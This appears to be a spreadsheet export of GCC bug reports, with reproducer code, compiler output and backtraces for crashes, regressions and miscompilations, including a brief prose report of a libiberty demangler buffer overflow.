execution tests started to fail on Solaris 8 and 9 both x86 and SPARC:
+FAIL: g++.dg/tree-prof/indir-call-prof-2.C execution    -g  -fprofile-generate
spawn [open ...]
ld.so.1: indir-call-prof-2.x01: fatal: /var/gcc/regression/trunk/9-gcc-gas/build
/gcc/testsuite/g++/indir-call-prof-2.x01: object requires TLS but TLS failed to
 initialize
This obviously happens since profiling now uses TLS under the hood:
[5]     |         4|       4|TLS  |LOCL |0    |9      |__gcov_indirect_call_callee
[6]     |         0|       4|TLS  |LOCL |0    |9      |__gcov_indirect_call_counters
So it is caused by this patch:
2011-04-27  Xinliang David Li  
        * tree-profile.c (init_ic_make_global_vars): Set
        tls attribute on ic vars.
        * coverage.c (coverage_end_function): Initialize
        function_list with zero.
Some platforms require special options for TLS which is handled by
dg-add-options tls.  It seems that all tests in those directories should be
marked
  dg-require-effective-target tls_runtime
  dg-add-options tls
or rather this should be handled in the .exp files instead.
  Rainer</t>
  </si>
  <si>
    <t>GCC-31395</t>
  </si>
  <si>
    <t>[4.2 Only] Colon edit descriptor is ignored unless preceded by a comma or a slash</t>
  </si>
  <si>
    <t>When run the following program:
PROGRAM test
INTEGER :: i = 1
WRITE(* 10) i
10 FORMAT('i ='I2:' this should not print')
END PROGRAM test
It prints:
i = 1 this should not print
If I insert a comma or a slash between I2 and : it will work correctly.</t>
  </si>
  <si>
    <t>GCC-25429</t>
  </si>
  <si>
    <t>can't see private static final int CREATE = 1</t>
  </si>
  <si>
    <t>[cagney@eclipse_1 jdom-1.0]$ gcj4 -C -I src/java src/java/org/jdom/ContentList.java
src/java/org/jdom/ContentList.java: In class 'C$I':
src/java/org/jdom/ContentList.java: In method 'C$I.f()':
src/java/org/jdom/ContentList.java:7: error: Constant expression required.
               case CONST:
               ^
src/java/org/jdom/ContentList.java: In class 'C':
src/java/org/jdom/ContentList.java: In method '()':
src/java/org/jdom/ContentList.java:3: error: final field â€˜CONSTâ€™ may not have
been initialized
src/java/org/jdom/ContentList.java:1: confused by earlier errors bailing out
class C
{
    private static final int CONST  = 0
    class I {
        public void f () {
            switch(0) {
            case CONST:
            }
        }
    }
}</t>
  </si>
  <si>
    <t>GCC-12653</t>
  </si>
  <si>
    <t>Resolution of DR 303 (WP) still unimplemented</t>
  </si>
  <si>
    <t>Another internal reminder.
Basically operator&gt;&gt;(... bitset&amp;) must use widen not narrow.</t>
  </si>
  <si>
    <t>GCC-65333</t>
  </si>
  <si>
    <t>[5 Regression] error: incomplete type used in nested name specifier</t>
  </si>
  <si>
    <t>The testcase from PR65328 shows:
markus@x4 fatal % cat sequence.ii
template  struct A
{
  using type = int
  template  using array = A
  void
  m_fn1 ()
  {
    array::data
  }
}
markus@x4 fatal % g++ -std=c++11 -c sequence.ii
sequence.ii: In member function â€˜void A::m_fn1()â€™:
sequence.ii:8:5: error: incomplete type â€˜A::array {aka A}â€™ used in nested name specifier
     array::data
     ^
4.8 4.9 EDG and clang accept the code.</t>
  </si>
  <si>
    <t>GCC-41896</t>
  </si>
  <si>
    <t>[c++0x] Segfault because of a nested lambda function</t>
  </si>
  <si>
    <t>Code for triggering the BUG:
float nested_lambda()
{
	float val
	[val]()
	{
		[val]()
		{
		}
	}
}
 float nested_lambda() nested_lambda()::
:7:4: internal compiler error: Szegmens hiba
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
according to gdb the segfault originates at: cp/semantics.c:2814 and it's a null pointer dereferencing. After a bit of inspection it was revealed that in the code:
decl = add_default_capture (lambda_stack
llambda_stack is NULL.
I tried the code:
float nested_lambda()
{
	float val
	[val]()
	{
		float val2 = val
		[val2]()
		{
		}
	}
}
which seems to be working fine.</t>
  </si>
  <si>
    <t>GCC-55</t>
  </si>
  <si>
    <t>using-directives in templates</t>
  </si>
  <si>
    <t xml:space="preserve"> Original-Message-ID: 
 Date: Fri 19 Nov 1999 18:15:36 -0700
 Hi
 The following code does not compile apparently due to a bug in the way
 function templates and namespaces are handled: class templates seem to work
 properly.
 Thanks
 John
 ===========================
 John A. Pedretti Rogue Wave Software Inc.   
 (303) 545-3150     pedretti@roguewave.com  
 ===========================
 ---------------------------------------
 // foo.cc
 namespace xx {
     // declare function template inside namespace
     template 
     void foo (T&amp;) { }
 }
 // using namespace xx          // compiles if the using declaration is
 moved to file scope
 // declare function template inside global namespace
 template 
 void bar (T&amp; t) {
     using namespace xx
     foo (t)
 //    xx::foo (t)                       // compiles if foo() is explicitly
 qualified
 }
 template void bar (const int  // instantiate bar
 ----------------------------------------
 output of g++ -c -v foo.cc:
 Reading specs from /usr/lib/gcc-lib/i686-pc-linux-gnu/2.95.2/specs
 gcc version 2.95.2 19991024 (release)
  /usr/lib/gcc-lib/i686-pc-linux-gnu/2.95.2/cpp -lang-c++ -v -D__GNUC__=2
 -D__GNUG__=2 -D__GNUC_MINOR__=95 -D__cplusplus -D__ELF__ -Dunix -D__i386__
 -Dlinux -D__ELF__ -D__unix__ -D__i386__ -D__linux__ -D__unix -D__linux
 -Asystem(posix) -D__EXCEPTIONS -Acpu(i386) -Amachine(i386) -Di386 -D__i386
 -D__i386__ -Di686 -Dpentiumpro -D__i686 -D__i686__ -D__pentiumpro
 -D__pentiumpro__ foo.cc /tmp/cc72F7M1.ii
 GNU CPP version 2.95.2 19991024 (release) (i386 Linux/ELF)
 #include ... search starts here:
 #include  search starts here:
  /usr/lib/gcc-lib/i686-pc-linux-gnu/2.95.2/../../../../include/g++-3
  /usr/local/include
 /usr/lib/gcc-lib/i686-pc-linux-gnu/2.95.2/../../../../i686-pc-linux-gnu/incl
 ude
  /usr/lib/gcc-lib/i686-pc-linux-gnu/2.95.2/include
  /usr/include
 End of search list.
 The following default directories have been omitted from the search path:
 End of omitted list.
  /usr/lib/gcc-lib/i686-pc-linux-gnu/2.95.2/cc1plus /tmp/cc72F7M1.ii -quiet
 -dumpbase foo.cc -version -o /tmp/ccMoxa8S.s
 GNU C++ version 2.95.2 19991024 (release) (i686-pc-linux-gnu) compiled by
 GNU C version 2.95.2 19991024 (release).
 foo.cc:19: template-id `bar' for `bar(const int &amp;)' does not match any
 template declaration
 foo.cc:19: confused by earlier errors bailing out
 Compilation exited abnormally with code 1 at Fri Nov 19 20:16:49
Release:
2.95.2</t>
  </si>
  <si>
    <t>GCC-35355</t>
  </si>
  <si>
    <t>[4.3/4.4 regression] CPU_TIME gives wrong values on mingw</t>
  </si>
  <si>
    <t>Inconsistent or odd call cpu_time(x) behaviour on the current release of gfortran. I am using the 32 bit Mingw version of gfortran.
C:\&gt;gfortran -v
Using built-in specs.
Target: i386-pc-mingw32
Configured with: ../trunk/configure --prefix=/mingw --enable-languages=cfortran --with-gmp=/home/FX/local --with-ld=/mingw/bin/ld --with-as=/mingw/bin/as --disable-werror --enable-bootstrap --enable-threads --disable-nls --build=i386-pc-mingw32 --enable-libgomp --disable-shared
Thread model: win32
gcc version 4.3.0 20080127 (experimental) [trunk revision 131883] (GCC)
The call cpu_time(x) operations worked perfectly under a fairly recent previous release of gfortran (sorry I no longer have the version info).
I have declared x as follows:-
integerparameter :: pr=selected_real_kind(637)
real(kind=pr) :: x
Unfortunately my code is very lengthy - but I could send it as an example if really necessary.
Edmund Dunlop.</t>
  </si>
  <si>
    <t>GCC-60553</t>
  </si>
  <si>
    <t>segfault in gt_ggc_mx_lang_tree_node in Chromium with LTO</t>
  </si>
  <si>
    <t>I do compile Chromium with LTO and there's ICE with enormous call stack:
gcc --version:
gcc (GCC) 4.9.0 20140313 (experimental)
ld --version:
GNU gold (GNU Binutils 2.24.51.20140304) 1.11
(gdb) bt -20
#529301 0x00000000005aae8e in gt_ggc_mx_lang_tree_node (x_p=0x7f5c763af738) at ./gtype-lto.h:359
#529302 0x00000000005aaf8b in gt_ggc_mx_lang_tree_node (x_p=0x7f5c644eedc8) at ./gtype-lto.h:378
#529303 0x00000000005aae8e in gt_ggc_mx_lang_tree_node (x_p=0x7f5c763a40a8) at ./gtype-lto.h:359
#529304 0x00000000005a92ef in gt_ggc_mx_lang_tree_node (x_p=0x7f5c763a70c0) at ./gtype-lto.h:55
#529305 0x00000000005aae54 in gt_ggc_mx_lang_tree_node (x_p=0x7f5c763a4150) at ./gtype-lto.h:357
#529306 0x00000000005a92ef in gt_ggc_mx_lang_tree_node (x_p=0x7f5c763a73a0) at ./gtype-lto.h:55
#529307 0x00000000005aae37 in gt_ggc_mx_lang_tree_node (x_p=0x7f5c763a4690) at ./gtype-lto.h:356
#529308 0x00000000005aadfd in gt_ggc_mx_lang_tree_node (x_p=0x7f5c763c2c78) at ./gtype-lto.h:354
#529309 0x00000000005aa694 in gt_ggc_mx_lang_tree_node (x_p=0x7f5c7650fc00) at ./gtype-lto.h:263
#529310 0x0000000000821c23 in gt_ggc_m_P9tree_node4htab (x_p=0x7f5c7775a850) at gtype-desc.c:3185
#529311 0x00000000007bfde6 in ggc_mark_root_tab (rt=0x10cd140 ) at ../../gcc/ggc-common.c:133
#529312 0x00000000007c0281 in ggc_mark_roots () at ../../gcc/ggc-common.c:152
#529313 0x00000000005d0c2a in ggc_collect () at ../../gcc/ggc-page.c:2077
#529314 0x00000000005c32e7 in read_cgraph_and_symbols (nfiles=11258 fnames=0x36701f0) at ../../gcc/lto/lto.c:3004
#529315 0x00000000005c406a in lto_main () at ../../gcc/lto/lto.c:3406
#529316 0x00000000009e4273 in compile_file () at ../../gcc/toplev.c:548
#529317 0x00000000009e640a in do_compile () at ../../gcc/toplev.c:1914
#529318 0x00000000009e6575 in toplev_main (argc=11283 argv=0x35fe750) at ../../gcc/toplev.c:1990
#529319 0x00007f5c765b6be5 in __libc_start_main () from /lib64/libc.so.6
#529320 0x0000000000587831 in _start () at ../sysdeps/x86_64/start.S:122
(gdb) bt 10
#0  0x00000000005cec2c in lookup_page_table_entry (p=) at ../../gcc/ggc-page.c:584
#1  0x00000000005cfc5e in ggc_set_mark (p=0x7f5c399c1170) at ../../gcc/ggc-page.c:1467
#2  0x00000000005a9222 in gt_ggc_mx_lang_tree_node (x_p=0x7f5c399c1170) at ./gtype-lto.h:36
#3  0x00000000005aae1a in gt_ggc_mx_lang_tree_node (x_p=0x7f5c399c6f18) at ./gtype-lto.h:355
#4  0x00000000005aaf34 in gt_ggc_mx_lang_tree_node (x_p=0x7f5c399c6e70) at ./gtype-lto.h:375
#5  0x00000000005aa4b8 in gt_ggc_mx_lang_tree_node (x_p=0x7f5c399c10b8) at ./gtype-lto.h:246
#6  0x00000000005aaf17 in gt_ggc_mx_lang_tree_node (x_p=0x7f5c399c60a8) at ./gtype-lto.h:374
#7  0x00000000005aaf34 in gt_ggc_mx_lang_tree_node (x_p=0x7f5c399bf5e8) at ./gtype-lto.h:375
#8  0x00000000005aa461 in gt_ggc_mx_lang_tree_node (x_p=0x7f5c399bae60) at ./gtype-lto.h:243
#9  0x00000000005aaf17 in gt_ggc_mx_lang_tree_node (x_p=0x7f5c399bf348) at ./gtype-lto.h:374
I don't know what to dump if you are interested I can add all kind info you need.</t>
  </si>
  <si>
    <t>GCC-21266</t>
  </si>
  <si>
    <t>[4.1 Regression] verify_ssa failed</t>
  </si>
  <si>
    <t>$ cat minlc.c
void minlc(float *a int n)
{
    int i
    float mv = a[0]
    for (i=1 i&lt;n i++)
    {
        if(a[i] &lt; mv)
            mv = a[i]
    }
}
$ gcc -O2 -ftree-vectorize -ftree-vectorizer-verbose=3 -S minlc.c
minlc.c: In function 'minlc':
minlc.c:2: error: Definition in block 2 follows the use
for SSA_NAME: i_13 in statement:
mv_1 = n_7 &gt; i_13 ? mv_12 : mv_20
minlc.c:2: internal compiler error: verify_ssa failed.
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
$ gcc -v
Using built-in specs.
Target: ia64-unknown-linux-gnu
Configured with: ../gcc-4.1-20050424/configure --prefix=/home/zfkts --enable-
languages=cf95
Thread model: posix
gcc version 4.1.0 20050424 (experimental)</t>
  </si>
  <si>
    <t>GCC-36078</t>
  </si>
  <si>
    <t>[4.4 Regression] gfortran fails to build cpu2006/465.tonto</t>
  </si>
  <si>
    <t>Start from trunk 134730 still fail by 134775:
$ cat f2.f90
   subroutine foo(funcpeval)
      real(kind=kind(1.0d0)) dimension(30:40:40:4) :: p
      logical(kind=kind(.true.)) dimension(555) :: eval
      interface
         subroutine func(valuespt)
            real(kind=kind(1.0d0)) dimension(:) intent(out) :: values
            real(kind=kind(1.0d0)) dimension(::) intent(in) :: pt
         end subroutine
      end interface
      real(kind=kind(1.0d0)) dimension(1253) :: pt
      integer(kind=kind(1)) :: n_pt
      n_pt = 1
      pt(1:n_pt:) = &amp;
         reshape( &amp;
            pack( &amp;
               transpose(reshape(p(/3125/))) &amp;
               spread(reshape(eval(/125/))dim=2ncopies=3)) &amp;
            (/n_pt3/))
   end subroutine
   end 
$ gfortran -v
Using built-in specs.
Target: x86_64-unknown-linux-gnu
Configured with: ../src/configure --disable-bootstrap --enable-languages=cfortran
Thread model: posix
gcc version 4.4.0 20080427 (experimental) [trunk revision 134730] (GCC) 
$ gfortran -c -O2 f2.f90
f2.f90: In function 'foo':
f2.f90:1: internal compiler error: in execute_todo at passes.c:991
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-23315</t>
  </si>
  <si>
    <t>java produces mismatch types in MODIFY_EXPR down cast</t>
  </si>
  <si>
    <t>Testcase:
class t1
{
  native t2 getParent()
  void gg(t1 t5)
  {
    t5 = t5.getParent()
  }
}
class t2 extends t1 { }
The other testcase reduced from gnu/awt/LightweightRedirector.java.
Again use the first patch in PR 22368.</t>
  </si>
  <si>
    <t>GCC-40781</t>
  </si>
  <si>
    <t>[4.5 Regression] Revision 149722 failed to bootstrap</t>
  </si>
  <si>
    <t>On Linux/ia64 revision 149722:
http://gcc.gnu.org/ml/gcc-cvs/2009-07/msg00603.html
failed to bootstrap:
cc1: warnings being treated as errors
../../src-trunk/gcc/builtins.c: In function 'expand_builtin_memcmp':
../../src-trunk/gcc/builtins.c:4171:14: error: unused variable 'loc'
../../src-trunk/gcc/builtins.c: In function 'expand_builtin_strncmp':
../../src-trunk/gcc/builtins.c:4436:14: error: unused variable 'loc'
make[6]: *** [builtins.o] Error 1</t>
  </si>
  <si>
    <t>GCC-4271</t>
  </si>
  <si>
    <t>excess warnings</t>
  </si>
  <si>
    <t>Warning messages about extra characters after #endif
are annoying and unnecessarily clog up log files.
This happens very frequently as an aid to help identify
closing nested ifdefs.  There is probably a way to
turn these messages off but what used to be clean under
older versions of gcc is no longer clean and other
potentially useful messages might be obscured.
Release:
3.0.1
Environment:
solaris 8 x86
How-To-Repeat:
#ifdef FOO
#ifdef BAR
...
#endif BAR
#endif FOO</t>
  </si>
  <si>
    <t>GCC-35401</t>
  </si>
  <si>
    <t>[4.3/4.4 Regression] libstdc++ linked to system /usr/lib/libgcc_s.1.dylib not new  gcc4.3 libgcc_s.1.dylib</t>
  </si>
  <si>
    <t>I installed gcc4.3 20080221 onto an intel mac core 2 duo os x10.5.2 using macports
The configure arguments (with prefix = /opt/local) are:
47      configure.args  --enable-languages=cc++objcobj-c++ \
48                      --libdir=${prefix}/lib/${name} \
49                      --includedir=${prefix}/include/${name} \
50                      --infodir=${prefix}/share/info \
51                      --mandir=${prefix}/share/man \
52                      --with-local-prefix=${prefix} \
53                      --with-system-zlib \
54                      --disable-nls \
55                      --program-suffix=-mp-${major} \
56                      --with-gxx-include-dir=${prefix}/include/${name}/c++/ \
57                      --with-gmp=${prefix} \
58                      --with-mpfr=${prefix}
 % otool -L /opt/local/lib/gcc43/libstdc++.6.dylib
gives:
/opt/local/lib/gcc43/libstdc++.6.dylib:
       /opt/local/lib/gcc43/libstdc++.6.dylib (compatibility version 7.0.0
current version 7.10.0)
       /usr/lib/libSystem.B.dylib (compatibility version 1.0.0 current
version 111.0.0)
       /usr/lib/libgcc_s.1.dylib (compatibility version 1.0.0 current version 1.0.0)
So /opt/local/lib/gcc43/libstdc++.6.dylib is linked to the old system
/usr/lib/libgcc_s.1.dylib instead of to the new
/opt/local/lib/gcc43/libgcc_s.1.dylib</t>
  </si>
  <si>
    <t>agn</t>
  </si>
  <si>
    <t>GCC-9055</t>
  </si>
  <si>
    <t>class members destructors don't executed</t>
  </si>
  <si>
    <t>If an exception is thrown inside class destructor the members destructors must be executed. However g++ generated code don't execute members destructors.
Release:
3.2.1
Environment:
ALLUSERSPROFILE=C:\Documents and Settings\All Users
APPDATA=C:\Documents and Settings\Kostia\Application Data
CommonProgramFiles=C:\Program Files\Common Files
COMPUTERNAME=KS-HOME
ComSpec=C:\WINDOWS\system32\cmd.exe
DDKROOT=c:\tools\win2kddk
FARLANG=English
HOMEDRIVE=C:
HOMEPATH=\Documents and Settings\Kostia
include=C:\Program Files\Microsoft Visual Studio\VC98\atl\includeC:\Program Files\Microsoft Visual Studio\VC98\mfc\includeC:\Program Files\Microsoft Visual Studio\VC98\include
ks=d:\work\rus
lib=C:\Program Files\Microsoft Visual Studio\VC98\mfc\libC:\Program Files\Microsoft Visual Studio\VC98\lib
LOGONSERVER=\\KS-HOME
MSDevDir=C:\Program Files\Microsoft Visual Studio\Common\MSDev98
MSVCDir=C:\Program Files\Microsoft Visual Studio\VC98
NUMBER_OF_PROCESSORS=1
OS=Windows_NT
Path=C:\WINDOWS\system32C:\WINDOWSC:\WINDOWS\System32\WbemC:\Tools\perl\binC:\Program Files\Microsoft Visual Studio\Common\MSDev98\BinC:\Program Files\Microsoft Visual Studio\VC98\BinC:\Program Files\Microsoft Visual Studio\Common\Tools\WinNTC:\Program Files\Microsoft Visual Studio\Common\Toolsc:\tools\mingw\binc:\tools\(rus)d:\work\rus\binc:\tools\batsc:\tools\perl\binc:\tools\qt\30~1.4\binC:\Program Files\Far
PATHEXT=.COM.EXE.BAT.CMD.VBS.VBE.JS.JSE.WSF.WSH
PROCESSOR_ARCHITECTURE=x86
PROCESSOR_IDENTIFIER=x86 Family 6 Model 8 Stepping 10 GenuineIntel
PROCESSOR_LEVEL=6
PROCESSOR_REVISION=080a
ProgramFiles=C:\Program Files
PROMPT=$P$G
qmakespec=win32-msvc
qtdir=c:\tools\qt\30~1.4
SESSIONNAME=Console
SystemDrive=C:
SystemRoot=C:\WINDOWS
TEMP=C:\DOCUME~1\Kostia\LOCALS~1\Temp
TMP=C:\DOCUME~1\Kostia\LOCALS~1\Temp
USERDOMAIN=KS-HOME
USERNAME=Kostia
USERPROFILE=C:\Documents and Settings\Kostia
VcOsDir=WINNT
VSCommonDir=C:\Program Files\Microsoft Visual Studio\Common
windir=C:\WINDOWS</t>
  </si>
  <si>
    <t>kostia.stepaniuk</t>
  </si>
  <si>
    <t>GCC-61233</t>
  </si>
  <si>
    <t>Demangler crash (GDB PR 16957)</t>
  </si>
  <si>
    <t>The demangler crashes when given this symbol:
_Z7ZipWithI7QStringS0_5QListZN4oral6detail16AdaptCreateTableI7AccountEES0_RKNS3_16CachedFieldsDataEEUlRKS0_SA_E_ET1_IDTclfp1_cvT__EcvT0__EEEERKT1_ISC_ERKT1_ISD_ET2_
See https://sourceware.org/bugzilla/show_bug.cgi?id=16957</t>
  </si>
  <si>
    <t>GCC-45603</t>
  </si>
  <si>
    <t>crash in build_addr_func</t>
  </si>
  <si>
    <t>The following code crashes cc1plus (tested with 4.3 4.4 and trunk revision 164022) inside build_addr_func:
//start code (test.cpp)
template
struct Singleton
{
    static T* get()
    {
        static T instance
        return 
    }
    ~Singleton() {}
}
struct Foo : Singleton
{
}
extern C int __cxa_guard_acquire()
{
}
void foo()
{
    Foo::get()
}
//end code
It does not crash when you remove ~Singleton or __cxa_guard_acquire.
Complete output from GCC:
$ /usr/local/bin/g++ -v test.cpp 
Using built-in specs.
COLLECT_GCC=/usr/local/bin/g++
COLLECT_LTO_WRAPPER=/usr/local/libexec/gcc/i686-pc-linux-gnu/4.6.0/lto-wrapper
Target: i686-pc-linux-gnu
Configured with: ./configure : (reconfigured) ./configure --enable-languages=cc++fortranjavaobjc --no-create --no-recursion
Thread model: posix
gcc version 4.6.0 20100908 (experimental) (GCC) 
COLLECT_GCC_OPTIONS='-v' '-shared-libgcc' '-mtune=generic' '-march=pentiumpro'
 /usr/local/libexec/gcc/i686-pc-linux-gnu/4.6.0/cc1plus -quiet -v -D_GNU_SOURCE test.cpp -quiet -dumpbase test.cpp -mtune=generic -march=pentiumpro -auxbase test -version -o /tmp/ccpxf6oX.s
GNU C++ (GCC) version 4.6.0 20100908 (experimental) (i686-pc-linux-gnu)
        compiled by GNU C version 4.6.0 20100908 (experimental) GMP version 4.3.2 MPFR version 2.4.2-p1 MPC version 0.8.1
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
ignoring nonexistent directory /usr/local/lib/gcc/i686-pc-linux-gnu/4.6.0/../../../../i686-pc-linux-gnu/include
#include ... search starts here:
#include  search starts here:
 /usr/local/lib/gcc/i686-pc-linux-gnu/4.6.0/../../../../include/c++/4.6.0
 /usr/local/lib/gcc/i686-pc-linux-gnu/4.6.0/../../../../include/c++/4.6.0/i686-pc-linux-gnu
 /usr/local/lib/gcc/i686-pc-linux-gnu/4.6.0/../../../../include/c++/4.6.0/backward
 /usr/local/lib/gcc/i686-pc-linux-gnu/4.6.0/include
 /usr/local/include
 /usr/local/lib/gcc/i686-pc-linux-gnu/4.6.0/include-fixed
 /usr/include
End of search list.
GNU C++ (GCC) version 4.6.0 20100908 (experimental) (i686-pc-linux-gnu)
        compiled by GNU C version 4.6.0 20100908 (experimental) GMP version 4.3.2 MPFR version 2.4.2-p1 MPC version 0.8.1
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
Compiler executable checksum: 5f4083fa939042ee12c0a6b9cb546b1b
test.cpp: In static member function â€˜static T* Singleton::get() [with T = Foo]â€™:
test.cpp:23:10:   instantiated from here
test.cpp:6:18: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
And the backtrace from cc1plus:
#0  build_addr_func (function=0x0) at ../.././gcc/cp/call.c:261
#1  0x080ced47 in build_call_a (function=0x0 n=1 argarray=0xbffff220) at ../.././gcc/cp/call.c:312
#2  0x080cf486 in build_call_n (function=0x0 n=1) at ../.././gcc/cp/call.c:298
#3  0x0810840b in expand_static_init (decl=0xb7f4a840 init=0x0 init_const_expr_p=0 '\000' asmspec_tree= flags=0) at ../.././gcc/cp/decl.c:6485
#4  cp_finish_decl (decl=0xb7f4a840 init=0x0 init_const_expr_p=0 '\000' asmspec_tree= flags=0) at ../.././gcc/cp/decl.c:6045
#5  0x0812ef4f in tsubst_expr (t= args=0xb7f4b000 complain=3 in_decl=0xb7ec6f30 integral_constant_expression_p=0 '\000') at ../.././gcc/cp/pt.c:11733
#6  0x0812fea5 in tsubst_expr (t= args=0xb7f4b000 complain=3 in_decl=0xb7ec6f30 integral_constant_expression_p=0 '\000') at ../.././gcc/cp/pt.c:11634
#7  0x0812ee32 in tsubst_expr (t=0xb7eab678 args=0xb7f4b000 complain=3 in_decl=0xb7ec6f30 integral_constant_expression_p=0 '\000') at ../.././gcc/cp/pt.c:11795
#8  0x0815d282 in instantiate_decl (d= defer_ok= expl_inst_class_mem_p=0 '\000') at ../.././gcc/cp/pt.c:17007
#9  0x08166af8 in instantiate_pending_templates (retries=0) at ../.././gcc/cp/pt.c:17104
#10 0x0819a188 in cp_write_global_declarations () at ../.././gcc/cp/decl2.c:3637
#11 0x08598233 in compile_file (argc=2 argv=0xbffff714) at ../.././gcc/toplev.c:984
#12 do_compile (argc=2 argv=0xbffff714) at ../.././gcc/toplev.c:2411
#13 toplev_main (argc=2 argv=0xbffff714) at ../.././gcc/toplev.c:2452
#14 0x082c7beb in main (argc=2 argv=0xbffff714) at ../.././gcc/main.c:36</t>
  </si>
  <si>
    <t>jobnoorman</t>
  </si>
  <si>
    <t>GCC-53226</t>
  </si>
  <si>
    <t>[4.8 Regression] Endless loop in forwprop</t>
  </si>
  <si>
    <t>Hi All
i noticed that memory consumption for heavy template instantiations increased massively between gcc revision 187034 and 187074. If a compile my current project (unfortunately closed source) i got e.g.
&gt; top
top - 08:58:08 up 1 day 30 min 11 users  load average: 28.83 19.13 13.36
Mem:  24607424k total 24464568k used   142856k free      752k buffers
Swap: 52436120k total  6650108k used 45786012k free  4174408k cached
  PID PR  NI  VIRT  RES  SHR S %CPU %MEM   TIME+   COMMAND
14825 20   0 24.5g  18g  496 R 89.1 79.0   3:48.75 cc1plus
Mario.
---
&gt; uname -a
Linux ahsoka.intec.dom 2.6.32-220.13.1.el6.x86_64 #1 SMP Thu Mar 29 11:46:40 EDT 2012 x86_64 x86_64 x86_64 GNU/Linux
&gt; rpm -qa glibc* | grep -e 'glibc-[0-9]' | sort -u
glibc-2.12-1.47.el6_2.9.i686
glibc-2.12-1.47.el6_2.9.x86_64
&gt; g++ -v
Using built-in specs.
COLLECT_GCC=g++
COLLECT_LTO_WRAPPER=/app2/gcc/4.8.0-20120503-svn187074/x86_64/libexec/gcc/x86_64-unknown-linux-gnu/4.8.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: ./configure --prefix=/app2/gcc/4.8.0-20120503-svn187074/x86_64 --enable-languages=cc++fortran --disable-nls --with-gmp=/app2/gcc/4.8.0-20120503-svn187074/x86_64/aux --with-mpfr=/app2/gcc/4.8.0-20120503-svn187074/x86_64/aux --with-mpc=/app2/gcc/4.8.0-20120503-svn187074/x86_64/aux --with-ppl=/app2/gcc/4.8.0-20120503-svn187074/x86_64/aux --with-cloog=/app2/gcc/4.8.0-20120503-svn187074/x86_64/aux
Thread model: posix
gcc version 4.8.0 20120503 (experimental) (GCC) 
&gt; ld -v
GNU ld (GNU Binutils) 2.22.52.20120503</t>
  </si>
  <si>
    <t>GCC-1576</t>
  </si>
  <si>
    <t>crash before entering main</t>
  </si>
  <si>
    <t>Some programs that load multiple DSOs crash before entering main.
Initialization of the standard input and output streams (cin cout etc.) 
is split across two files stdstream.cc and ios.cc.  The initialization 
code assumes that the portion in stdstream.cc is always executed before 
the portion in ios.cc.  This assumption is not always true and some 
programs crash during execution of ios_base::Init::Init().
Release:
libstdc++-2.91
Environment:
RedHat Linux on SGI 330 (bug</t>
  </si>
  <si>
    <t>kainz</t>
  </si>
  <si>
    <t>GCC-39283</t>
  </si>
  <si>
    <t>volatile data types ignore __attribute__ ((__aligned ...))</t>
  </si>
  <si>
    <t>Maybe there are two bugs here.
#include 
typedef int ix __attribute__ ((__aligned__ (16)))
typedef volatile int vx __attribute__ ((__aligned__ (16)))
ix ix1 = __alignof__ (ix)
ix ix2 = __alignof__ (ix1)
vx vx1 = __alignof__ (vx)
vx vx2 = __alignof__ (vx1)
int main(void)
{
  printf (ix1: %d ix2: %d vx1: %d vx2: %d\n
	  ix1 ix2 vx1 vx2)
  return ix1 == ix2 
}
For i686-pc-linux-gnu observe 16 16 4 4 for the above program.  That's by itself surprising: the volatile specifier seems to nullify the attribute specifier.
For crisv32-axis-linux-gnu it's even worse: it's 16 16 1 4 at -O0 but 16 16 4 4 at -O2.  Bother.</t>
  </si>
  <si>
    <t>GCC-3015</t>
  </si>
  <si>
    <t>Internal compiler error on illegal code</t>
  </si>
  <si>
    <t>Internal compiler error when within a namespace a class
inheriting from another class incorrectly attempts to
declare a fixed-size array using a static member of the
same class.  The code itself is illegal so the problem can
be worked around by changing the code to be C++ compliant.
Release:
egcs-2.91.66 19990314/Linux (egcs-1.1.2 release)
Environment:
/usr/lib/gcc-lib/i386-redhat-linux/egcs-2.91.66/specs
How-To-Repeat:
Compile the following reduced test case:
namespace space {
  class c1 {}
  class c2 : public c1 {
    static const int N
    int mt[N]
  }
}</t>
  </si>
  <si>
    <t>gjkaiser</t>
  </si>
  <si>
    <t>GCC-70956</t>
  </si>
  <si>
    <t>[6/7 Regression] ICE in build_cross_bb_scalars_def at graphite-scop-detection.c:1725</t>
  </si>
  <si>
    <t>$ gcc  src/gcc/testsuite/gcc.dg/tree-ssa/vrp66.c -fgraphite-identity -O2
src/gcc/testsuite/gcc.dg/tree-ssa/vrp66.c: In function â€˜mainâ€™:
src/gcc/testsuite/gcc.dg/tree-ssa/vrp66.c:827:1: internal compiler error: in build_cross_bb_scalars_def at graphite-scop-detection.c:1725
 main ()
 ^~~~
0x1d2e067 build_cross_bb_scalars_def
	src/gcc/graphite-scop-detection.c:1725
0x1d2e3ee graphite_find_cross_bb_scalar_vars
	src/gcc/graphite-scop-detection.c:1796
0x1d2e5a1 try_generate_gimple_bb
	src/gcc/graphite-scop-detection.c:1832
0x1d2ea7f before_dom_children
	src/gcc/graphite-scop-detection.c:1947
0x1ce6174 dom_walker::walk(basic_block_def*)
	src/gcc/domwalk.c:265
0x1d2edb2 build_scops(vec*)
	src/gcc/graphite-scop-detection.c:2015
0x1d18996 graphite_transform_loops()
	src/gcc/graphite.c:307
0x1d18ab5 graphite_transforms
	src/gcc/graphite.c:356
0x1d18bd7 execute
	src/gcc/graphite.c:433
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-69687</t>
  </si>
  <si>
    <t>Buffer Overflow in libiberty</t>
  </si>
  <si>
    <t>Created attachment 37592
Test Case #1
The attached program binary causes a buffer overflow in cplus-dem.c when it tries to demangle specially crafted function arguments in the binary. Both the buffer size as well as the buffer content are controlled from the binary.
objdump -x -C 
nm -C 
Tested on the following configurations
* 2.6.32-573.7.1.el6.x86_64 #1 SMP Tue Sep 22 22:00:00 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
* 4.1.12-boot2docker #1 SMP Tue Nov 3 06:03:36 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
* Binutils versions: 2.20 and 2.26
Best regards
- Marcel
